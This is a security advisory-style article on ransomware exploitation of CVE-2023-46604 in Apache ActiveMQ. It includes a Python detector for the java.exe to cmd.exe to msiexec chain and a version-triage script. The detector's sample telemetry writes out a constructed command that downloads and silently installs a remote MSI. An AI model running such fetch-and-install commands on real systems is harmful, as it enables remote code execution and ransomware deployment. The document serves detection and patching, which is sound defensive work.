Reports have surfaced of attempts to exploit CVE-2023-46604, a remote code execution (RCE) vulnerability in Apache ActiveMQ's OpenWire protocol handling, against vulnerable internet-exposed brokers. Both Huntress and Rapid7 have reported exploitation activity: Huntress traced the earliest signs of intrusion back to October 10, 2023, and Rapid7 responded to threat activity on October 27, 2023.
Investigations by both firms revealed the same attack pattern. The ActiveMQ broker process (java.exe) spawned the CMD interpreter, which invoked msiexec to download and install MSI files (some with renamed extensions) from a remote server. Security agents on the compromised hosts responded to this activity, so the downloaded payloads failed to install.
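The process lineage described above (java.exe spawning cmd.exe, which in turn launches msiexec against a remote package) is a reliable detection opportunity, because an ActiveMQ broker has no legitimate reason to drive the Windows Installer. The following is an added example of that detection logic, not code from Huntress or Rapid7; the telemetry records, PIDs and the 198.51.100.10 download URL are constructed for illustration.

```python
"""Flag the java.exe -> cmd.exe -> msiexec.exe chain in process-creation telemetry.

Added example, not from Huntress or Rapid7. The events and the URL are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name only, e.g. "msiexec.exe"
    cmdline: str


# Constructed sample telemetry in the shape of Sysmon Event ID 1, not real incident data.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(100, 4,   "java.exe",     r"java.exe -jar activemq.jar start"),
    ProcEvent(200, 100, "cmd.exe",      r'cmd.exe /c "msiexec /q /i http://198.51.100.10/update.png"'),
    ProcEvent(300, 200, "msiexec.exe",  r"msiexec /q /i http://198.51.100.10/update.png"),
    # Benign: an interactive install launched from Explorer.
    ProcEvent(400, 50,  "explorer.exe", r"explorer.exe"),
    ProcEvent(401, 400, "msiexec.exe",  r"msiexec /i C:\Users\alice\Downloads\7zip.msi"),
    # Benign: scripted install from a deployment agent (parent PID 60 not in the sample).
    ProcEvent(500, 60,  "cmd.exe",      r"cmd.exe /c msiexec /q /i \\fileserver\apps\agent.msi"),
    ProcEvent(501, 500, "msiexec.exe",  r"msiexec /q /i \\fileserver\apps\agent.msi"),
]


def lineage(by_pid: Dict[int, ProcEvent], pid: int, max_depth: int = 5) -> List[str]:
    """Return [self, parent, grandparent, ...] image names, walking at most max_depth levels."""
    chain: List[str] = []
    ev: Optional[ProcEvent] = by_pid.get(pid)
    while ev is not None and len(chain) < max_depth:
        chain.append(ev.image.lower())
        ev = by_pid.get(ev.ppid)
    return chain


def is_remote_source(cmdline: str) -> bool:
    """True when msiexec is pointed at an http(s) package instead of a local or UNC path."""
    lowered = cmdline.lower()
    return "http://" in lowered or "https://" in lowered


def find_activemq_msiexec_chains(events: List[ProcEvent]) -> List[dict]:
    """Return one hit per msiexec.exe whose parent is cmd.exe and grandparent is java.exe."""
    by_pid = {e.pid: e for e in events}
    hits: List[dict] = []
    for ev in events:
        if ev.image.lower() != "msiexec.exe":
            continue
        chain = lineage(by_pid, ev.pid)
        # The observed intrusion pattern reads [msiexec.exe, cmd.exe, java.exe, ...].
        if len(chain) >= 3 and chain[1] == "cmd.exe" and chain[2] == "java.exe":
            hits.append({
                "pid": ev.pid,
                "chain": " <- ".join(chain[:3]),
                "remote_package": is_remote_source(ev.cmdline),
                "cmdline": ev.cmdline,
            })
    return hits


if __name__ == "__main__":
    for hit in find_activemq_msiexec_chains(SAMPLE_EVENTS):
        print(hit)
```

Against real telemetry, key the lookup on the unique process GUID your EDR or Sysmon emits rather than on the PID, since PIDs are reused; and because some ActiveMQ installations launch java.exe from a service wrapper, match on the broker's java.exe anywhere in the ancestry rather than only at the grandparent position if your environment warrants it.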
Notably, Rapid7 reported "more than half a dozen unsuccessful attempts to encrypt assets," describing the threat actor's activity as "somewhat clumsy." Rapid7's analysis of the dropped payloads uncovered encoded .NET payloads with ransomware capabilities, including stopping running processes and appending the .locked extension to encrypted files. The ransom note contained the contact email address service@hellokittycat[.]online, on which basis the activity was attributed to the HelloKitty ransomware family.
While both Huntress and Rapid7 reported that the encryption attempts and other follow-on activity were foiled, organizations running affected Apache ActiveMQ versions are strongly advised to upgrade promptly; the fixed releases are 5.15.16, 5.16.7, 5.17.6 and 5.18.3. If patching is not immediately feasible, remove the broker's internet exposure, in particular the OpenWire listener (TCP 61616 by default), until it can be upgraded.
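Because the fix landed at a different patch level on each maintained 5.x branch, a plain "newer is safer" comparison misclassifies hosts (5.16.7 is patched while 5.18.2 is not). The following is an added example of branch-aware version triage for an inventory, not code from the original report or the ActiveMQ project; the host names and versions are constructed, and treating branches newer than 5.18 as released after the fix is an assumption noted in the code.

```python
"""Triage Apache ActiveMQ versions against the CVE-2023-46604 fixed releases.

Added example, not from the original report or the ActiveMQ project.
"""
import re
from typing import Dict, Tuple

Version = Tuple[int, int, int]

# First release on each maintained 5.x branch that contains the fix.
FIXED_RELEASES: Dict[Tuple[int, int], Version] = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}


def parse_version(text: str) -> Version:
    """Parse '5.18.2', 'ActiveMQ 5.16.7' or '5.17' into a (major, minor, patch) tuple."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def is_vulnerable(text: str) -> bool:
    """True when the version predates the fix for its branch."""
    version = parse_version(text)
    branch = version[:2]
    if branch in FIXED_RELEASES:
        return version < FIXED_RELEASES[branch]
    if branch < (5, 15):
        # The advisory covers everything before 5.15.16; older branches received no fix.
        return True
    # Assumption: branches newer than 5.18 were cut after the fix landed.
    return False


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map host -> 'VULNERABLE' or 'patched' for a {host: version string} inventory."""
    return {
        host: ("VULNERABLE" if is_vulnerable(version) else "patched")
        for host, version in inventory.items()
    }


# Constructed inventory, not real hosts.
SAMPLE_INVENTORY = {
    "mq-prod-01": "5.18.2",
    "mq-prod-02": "5.18.3",
    "mq-legacy": "5.14.5",
    "mq-dev": "5.17.1",
    "mq-shared": "ActiveMQ 5.16.7",
}


if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host:12} {status}")
```

Feed it the version strings collected from each broker's activemq-all jar name or the web console banner; hosts marked VULNERABLE should be upgraded first, and their OpenWire listeners firewalled from the internet in the meantime.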